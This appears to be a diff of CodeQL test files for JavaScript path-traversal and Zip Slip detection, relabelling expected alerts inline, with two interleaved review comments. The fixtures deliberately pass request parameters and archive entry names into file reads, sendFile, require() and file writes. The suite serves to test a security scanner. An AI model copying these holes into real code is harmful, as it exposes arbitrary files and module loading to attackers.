@@ -374,58 +374,58 @@ app.get('/yet-another-prefix2', (req, res) => { import slash from 'slash'; app.get('/slash-stuff', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert - fs.readFileSync(slash(path)); // NOT OK + fs.readFileSync(slash(path)); // $ Alert }); app.get('/dotdot-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.match(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.match(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/join-spread', (req, res) => { - fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // NOT OK - fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // NOT OK + fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // $ Alert + fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // $ Alert }); app.get('/dotdot-matchAll-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.matchAll(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if 
(!path.matchAll(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.matchAll(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js index 1dac13246c6f..3c137faa8c94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js @@ -6,22 +6,22 @@ var http = require("http"), originalFs = require("original-fs"); var server = http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK - gracefulFs.readFileSync(path); // NOT OK - fsExtra.readFileSync(path); // NOT OK - originalFs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + gracefulFs.readFileSync(path); // $ Alert + fsExtra.readFileSync(path); // $ Alert + originalFs.readFileSync(path); // $ Alert - getFsModule(true).readFileSync(path); // NOT OK - getFsModule(false).readFileSync(path); // NOT OK + getFsModule(true).readFileSync(path); // $ Alert + getFsModule(false).readFileSync(path); // $ Alert - require("./my-fs-module").require(true).readFileSync(path); // NOT OK + require("./my-fs-module").require(true).readFileSync(path); // $ Alert let flexibleModuleName = require(process.versions["electron"] ? "original-fs" : "fs"); - flexibleModuleName.readFileSync(path); // NOT OK + flexibleModuleName.readFileSync(path); // $ Alert }); function getFsModule(special) { 
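Review bot: The `/dotdot-matchAll-regexp` cases cannot execute as written, so their expectations test only the guard model, and the conversion drops the `// OK` markers without saying so. `String.prototype.matchAll` returns an iterator, which is always truthy, and throws a TypeError when the regex lacks the `g` flag, so no `if (!path.matchAll(...))` body can run and the condition says nothing about the path at runtime. The unannotated reads therefore only document that the query models `matchAll` like `match` as a sanitizer guard. I would note that next to the first case: `// matchAll is modelled like match() here; at runtime it returns an iterator and requires the g flag`.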
@@ -35,50 +35,50 @@ function getFsModule(special) { var util = require("util"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - util.promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisifyAll(fs).readFileSync(path); // NOT OK + util.promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisifyAll(fs).readFileSync(path); // $ Alert }); const asyncFS = require("./my-async-fs-module"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK - asyncFS.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + asyncFS.readFileSync(path); // $ Alert - require("pify")(fs.readFileSync)(path); // NOT OK - require("pify")(fs).readFileSync(path); // NOT OK + require("pify")(fs.readFileSync)(path); // $ Alert + require("pify")(fs).readFileSync(path); // $ Alert - require('util.promisify')(fs.readFileSync)(path); // NOT OK + require('util.promisify')(fs.readFileSync)(path); // $ Alert - require("thenify")(fs.readFileSync)(path); // NOT OK + require("thenify")(fs.readFileSync)(path); // $ Alert const readPkg = require('read-pkg'); - var pkg = readPkg.readPackageSync({cwd: path}); // NOT OK - var pkgPromise = readPkg.readPackageAsync({cwd: path}); // NOT OK + var pkg = readPkg.readPackageSync({cwd: path}); // $ Alert + var pkgPromise = readPkg.readPackageAsync({cwd: path}); // $ Alert }); const mkdirp = require("mkdirp"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK - mkdirp(path); // NOT OK - mkdirp.sync(path); // NOT OK + 
fs.readFileSync(path); // $ Alert + mkdirp(path); // $ Alert + mkdirp.sync(path); // $ Alert func(path); }); function func(x) { - fs.readFileSync(x); // NOT OK + fs.readFileSync(x); // $ Alert } const fsp = require("fs/promises"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fsp.readFile(path); // NOT OK + fsp.readFile(path); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js index 7546bb2c2938..c198082b9932 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js @@ -3,12 +3,12 @@ const prettier = require("prettier"); const app = express(); app.get('/some/path', function (req, res) { - const { p } = req.params; - prettier.resolveConfig(p).then((options) => { // NOT OK + const { p } = req.params; // $ Source + prettier.resolveConfig(p).then((options) => { // $ Alert const formatted = prettier.format("foo", options); }); - prettier.resolveConfig("foo", {config: p}).then((options) => { // NOT OK + prettier.resolveConfig("foo", {config: p}).then((options) => { // $ Alert const formatted = prettier.format("bar", options); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js index 363b2f014c7a..8b0a64f523c9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js 
@@ -2,15 +2,15 @@ const puppeteer = require('puppeteer'); const parseTorrent = require('parse-torrent'); (async () => { - let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; + let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; // $ Source const browser = await puppeteer.launch(); const page = await browser.newPage(); - await page.pdf({ path: tainted, format: 'a4' }); + await page.pdf({ path: tainted, format: 'a4' }); // $ Alert const pages = await browser.pages(); for (let i = 0; i < something(); i++) { - pages[i].screenshot({ path: tainted }); + pages[i].screenshot({ path: tainted }); // $ Alert } await browser.close(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js index eebc95348ba6..23c89ab5baec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js @@ -10,7 +10,7 @@ function getTree(req, res, options) { var workspaceId = req.params.workspaceId; var realfileRootPath = workspaceId; // getfileRoot(workspaceId); var filePath = workspaceId; // path.join(options.workspaceDir,realfileRootPath, req.params["0"]); - withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); + withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); // $ Source } function getfileRoot(workspaceId) { @@ -19,7 +19,7 @@ function getfileRoot(workspaceId) { } function withStatsAndETag(filepath, callback) { - fs.readFileSync(filepath); // NOT OK + fs.readFileSync(filepath); // $ Alert }; function decodeUserIdFromWorkspaceId(workspaceId) { diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js index 465b5b70b690..ab5d3f008507 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js @@ -3,32 +3,32 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var obj = bla ? something() : path; - fs.readFileSync(obj.sub); // NOT OK + fs.readFileSync(obj.sub); // $ Alert obj.sub = "safe"; - fs.readFileSync(obj.sub); // OK + fs.readFileSync(obj.sub); obj.sub2 = "safe"; if (random()) { - fs.readFileSync(obj.sub2); // OK + fs.readFileSync(obj.sub2); } if (random()) { obj.sub3 = "safe" } - fs.readFileSync(obj.sub3); // NOT OK + fs.readFileSync(obj.sub3); // $ Alert obj.sub4 = - fs.readFileSync(obj.sub4) ? // NOT OK - fs.readFileSync(obj.sub4) : // NOT OK - fs.readFileSync(obj.sub4); // NOT OK + fs.readFileSync(obj.sub4) ? // $ Alert + fs.readFileSync(obj.sub4) : // $ Alert + fs.readFileSync(obj.sub4); // $ Alert }); server.listen(); @@ -36,8 +36,8 @@ server.listen(); var nodefs = require('node:fs'); var server2 = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; - nodefs.readFileSync(path); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + nodefs.readFileSync(path); // $ Alert }); server2.listen(); @@ -45,6 +45,6 @@ server2.listen(); const chownr = require("chownr"); var server3 = http.createServer(function (req, res) { - let path = url.parse(req.url, true).query.path; - chownr(path, "someuid", "somegid", function (err) {}); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + chownr(path, "someuid", "somegid", function (err) {}); // $ Alert }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js index 061dec18a908..b37ebc2926ad 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js @@ -7,11 +7,11 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - res.write(fs.readFileSync(['public', path].join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(['public', path].join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps let parts = ['public', path]; parts = parts.map(x => x.toLowerCase()); - res.write(fs.readFileSync(parts.join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(parts.join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js index 49c5fa78fe8d..a21ae5a6f915 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js 
@@ -3,13 +3,13 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source doRead(Promise.resolve(path)); }); async function doRead(pathPromise) { - fs.readFileSync(await pathPromise); // NOT OK - pathPromise.then(path => fs.readFileSync(path)); // NO TOK + fs.readFileSync(await pathPromise); // $ Alert + pathPromise.then(path => fs.readFileSync(path)); // $ Alert } server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js index 23f89c55c39f..d9c07feb26b6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js @@ -3,15 +3,14 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // BAD: loading a module based on un-sanitized query parameters - var m = require(req.param("module")); + var m = require(req.param("module")); // $ Alert - loading a module based on un-sanitized query parameters }); const resolve = require("resolve"); app.get('/some/path', function(req, res) { - var module = resolve.sync(req.param("module")); // NOT OK - resolving module based on query parameters + var module = resolve.sync(req.param("module")); // $ Alert - resolving module based on query parameters - resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // NOT OK - resolving module based on query parameters + resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // $ Alert - resolving module based on query parameters var module = res; }); }); \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js index f4f289895a86..1c58a6943fa2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js 
@@ -4,39 +4,33 @@ let path = require('path'); var app = express(); app.get('/some/path/:x', function(req, res) { - // BAD: sending a file based on un-sanitized query parameters - res.sendFile(req.param("gimme")); - // BAD: same as above - res.sendfile(req.param("gimme")); + res.sendFile(req.param("gimme")); // $ Alert - sending a file based on un-sanitized query parameters + res.sendfile(req.param("gimme")); // $ Alert - same as above - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendFile(req.param("gimme"), { root: process.cwd() }); - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendfile(req.param("gimme"), { root: process.cwd() }); - // BAD: doesn't help if user controls root - res.sendFile(req.param("file"), { root: req.param("dir") }); + res.sendFile(req.param("file"), { root: req.param("dir") }); // $ Alert - doesn't help if user controls root let homeDir = path.resolve('.'); - res.sendFile(homeDir + '/data/' + req.params.x); // OK: sendFile disallows ../ - res.sendfile('data/' + req.params.x); // OK: sendfile disallows ../ + res.sendFile(homeDir + '/data/' + req.params.x); // OK - sendFile disallows ../ + res.sendfile('data/' + req.params.x); // OK - sendfile disallows ../ - res.sendFile(path.resolve('data', req.params.x)); // NOT OK - res.sendfile(path.join('data', req.params.x)); // NOT OK + res.sendFile(path.resolve('data', req.params.x)); // $ Alert + res.sendfile(path.join('data', req.params.x)); // $ Alert res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/' - // BAD: downloading a file based on un-sanitized query parameters - res.download(req.param("gimme")); + res.download(req.param("gimme")); // $ Alert - // BAD: download allows ../ - res.download(homeDir + '/data/' + req.params.x); + res.download(homeDir + '/data/' + 
req.params.x); // $ Alert - res.download(path.join('data', req.params.x)); // NOT OK + res.download(path.join('data', req.params.x)); // $ Alert - // BAD: doesn't help if user controls root - res.download(req.param("file"), { root: req.param("dir") }); + res.download(req.param("file"), { root: req.param("dir") }); // $ Alert - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.download(req.param("gimme"), { root: process.cwd() }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js index 1b1e87b9a76a..6f281013a63c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js 
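Review bot: The three `res.download` cases at the end of this hunk lose the reason they are expected to alert, while the `sendFile` lines keep theirs. The removed comment `download allows ../` is what explains why `res.download(homeDir + '/data/' + req.params.x)` is flagged when the matching `res.sendFile(homeDir + '/data/' + req.params.x)` a few lines up is marked `OK - sendFile disallows ../`. I would keep the rationale after the marker, as the hunk already does for the `sendFile` alerts: `// $ Alert - download allows ../` and, for the `{ root: req.param("dir") }` call, `// $ Alert - doesn't help if user controls root`.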
@@ -3,29 +3,29 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; - fs.readFileSync(path.substring(i, j)); // OK - fs.readFileSync(path.substring(4)); // NOT OK - fs.readFileSync(path.substring(0, i)); // NOT OK - fs.readFileSync(path.substr(4)); // NOT OK - fs.readFileSync(path.slice(4)); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + fs.readFileSync(path.substring(i, j)); + fs.readFileSync(path.substring(4)); // $ Alert + fs.readFileSync(path.substring(0, i)); // $ Alert + fs.readFileSync(path.substr(4)); // $ Alert + fs.readFileSync(path.slice(4)); // $ Alert - fs.readFileSync(path.concat(unknown)); // NOT OK - fs.readFileSync(unknown.concat(path)); // NOT OK - fs.readFileSync(unknown.concat(unknown, path)); // NOT OK + fs.readFileSync(path.concat(unknown)); // $ Alert + fs.readFileSync(unknown.concat(path)); // $ Alert + fs.readFileSync(unknown.concat(unknown, path)); // $ Alert - fs.readFileSync(path.trim()); // NOT OK - fs.readFileSync(path.toLowerCase()); // NOT OK + fs.readFileSync(path.trim()); // $ Alert + fs.readFileSync(path.toLowerCase()); // $ Alert - fs.readFileSync(path.split('/')); // OK (readFile throws an exception when the filename is an array) - fs.readFileSync(path.split('/')[0]); // OK -- for now - fs.readFileSync(path.split('/')[i]); // NOT OK - fs.readFileSync(path.split(/\//)[i]); // NOT OK - fs.readFileSync(path.split("?")[0]); // NOT OK - fs.readFileSync(path.split(unknown)[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown).whatever); // OK -- but still flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown)); // NOT OK - fs.readFileSync(path.split("?")[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] + fs.readFileSync(path.split('/')); // OK - readFile throws an exception when the filename is an array + fs.readFileSync(path.split('/')[0]); // OK - for now + 
fs.readFileSync(path.split('/')[i]); // $ Alert + fs.readFileSync(path.split(/\//)[i]); // $ Alert + fs.readFileSync(path.split("?")[0]); // $ Alert + fs.readFileSync(path.split(unknown)[i]); // $ MISSING: Alert + fs.readFileSync(path.split(unknown).whatever); // $ SPURIOUS: Alert + fs.readFileSync(path.split(unknown)); // $ Alert + fs.readFileSync(path.split("?")[i]); // $ MISSING: Alert }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js index 1e95cf84ec76..d3c74ed8493d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js @@ -2,7 +2,7 @@ const parseTorrent = require('parse-torrent'), fs = require('fs'); function getTorrentData(dir, torrent){ - let name = parseTorrent(torrent).name, + let name = parseTorrent(torrent).name, // $ Source loc = dir + "/" + name + ".torrent.data"; - return fs.readFileSync(loc); // NOT OK + return fs.readFileSync(loc); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts index f5fd62b2ee00..a0d2a78b5d7b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts 
@@ -6,29 +6,28 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list let path2 = path; - path2 ||= res.write(fs.readFileSync(path2)); // GOOD: path is falsy + path2 ||= res.write(fs.readFileSync(path2)); // OK - path is falsy let path3 = path; - path3 &&= res.write(fs.readFileSync(path3)); // BAD: path is truthy + path3 &&= res.write(fs.readFileSync(path3)); // $ Alert - path is truthy let path4 = path; - path4 ??= res.write(fs.readFileSync(path4)); // GOOD - path is null or undefined - but we don't capture that. [INCONSISTENCY] + path4 ??= res.write(fs.readFileSync(path4)); // $ SPURIOUS: Alert - path is null or undefined - but we don't capture that. let path5 = path; path5 &&= "clean"; - res.write(fs.readFileSync(path5)); // GOOD: path is either falsy or "clean"; + res.write(fs.readFileSync(path5)); // OK - path is either falsy or "clean"; let path6 = path; path6 ||= "clean"; - res.write(fs.readFileSync(path6)); // BAD: path can still be tainted + res.write(fs.readFileSync(path6)); // $ Alert - path can still be tainted }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js index 37ba5b7ab0e3..111ecd10c5a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js 
@@ -1 +1 @@ -module.exports = (req, res) => res.render(req.params[0]); +module.exports = (req, res) => res.render(req.params[0]); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js index 1de89842eb0d..8f587f6e143c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js @@ -3,5 +3,5 @@ var AdmZip = require('adm-zip'); var zip = new AdmZip("archive.zip"); var zipEntries = zip.getEntries(); zipEntries.forEach(function(zipEntry) { - fs.createWriteStream(zipEntry.entryName); + fs.createWriteStream(zipEntry.entryName); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js index 5398586e1251..543d43ffa310 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js @@ -3,10 +3,10 @@ const tar = require('tar-stream'); const extract = tar.extract(); extract.on('entry', (header, stream, next) => { - const out = fs.createWriteStream(header.name); + const out = fs.createWriteStream(header.name); // $ Alert if (header.linkname) { - fs.linkSync(header.linkname, "foo"); + fs.linkSync(header.linkname, "foo"); // $ Alert } stream.pipe(out); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected index 67e38f937ba0..f8916181de12 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected 
@@ -1,3 +1,28 @@ +#select +| AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | Unsanitized archive entry, which may contain '..', is used in a $@. | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | file system operation | +| TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:6:36:6:46 | header.name | file system operation | +| TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:9:17:9:31 | header.linkname | file system operation | +| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:6:22:6:29 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad2.js:6:22:6:29 | fileName | file system operation | +| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:8:37:8:44 | fileName | file system operation | +| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:16:30:16:37 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:16:30:16:37 | fileName | file system operation | +| ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:23:28:23:35 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. 
| ZipSlipBad.js:23:28:23:35 | fileName | file system operation | +| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:31:26:31:29 | name | file system operation | +| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:35:26:35:29 | name | file system operation | +| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | file system operation | +edges +| ZipSlipBad2.js:5:9:5:46 | fileName | ZipSlipBad2.js:6:22:6:29 | fileName | provenance | | +| ZipSlipBad2.js:5:20:5:46 | 'output ... ry.path | ZipSlipBad2.js:5:9:5:46 | fileName | provenance | | +| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:20:5:46 | 'output ... 
ry.path | provenance | Config | +| ZipSlipBad.js:7:11:7:31 | fileName | ZipSlipBad.js:8:37:8:44 | fileName | provenance | | +| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:11:7:31 | fileName | provenance | | +| ZipSlipBad.js:15:11:15:31 | fileName | ZipSlipBad.js:16:30:16:37 | fileName | provenance | | +| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:11:15:31 | fileName | provenance | | +| ZipSlipBad.js:22:11:22:31 | fileName | ZipSlipBad.js:23:28:23:35 | fileName | provenance | | +| ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:11:22:31 | fileName | provenance | | +| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | provenance | | +| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | provenance | | +| ZipSlipBadUnzipper.js:7:9:7:29 | fileName | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | provenance | | +| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:9:7:29 | fileName | provenance | | nodes | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | semmle.label | zipEntry.entryName | | TarSlipBad.js:6:36:6:46 | header.name | semmle.label | header.name | 
@@ -22,29 +47,4 @@ nodes | ZipSlipBadUnzipper.js:7:9:7:29 | fileName | semmle.label | fileName | | ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | semmle.label | entry.path | | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | semmle.label | fileName | -edges -| ZipSlipBad2.js:5:9:5:46 | fileName | ZipSlipBad2.js:6:22:6:29 | fileName | provenance | | -| ZipSlipBad2.js:5:20:5:46 | 'output ... ry.path | ZipSlipBad2.js:5:9:5:46 | fileName | provenance | | -| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:20:5:46 | 'output ... ry.path | provenance | Config | -| ZipSlipBad.js:7:11:7:31 | fileName | ZipSlipBad.js:8:37:8:44 | fileName | provenance | | -| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:11:7:31 | fileName | provenance | | -| ZipSlipBad.js:15:11:15:31 | fileName | ZipSlipBad.js:16:30:16:37 | fileName | provenance | | -| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:11:15:31 | fileName | provenance | | -| ZipSlipBad.js:22:11:22:31 | fileName | ZipSlipBad.js:23:28:23:35 | fileName | provenance | | -| 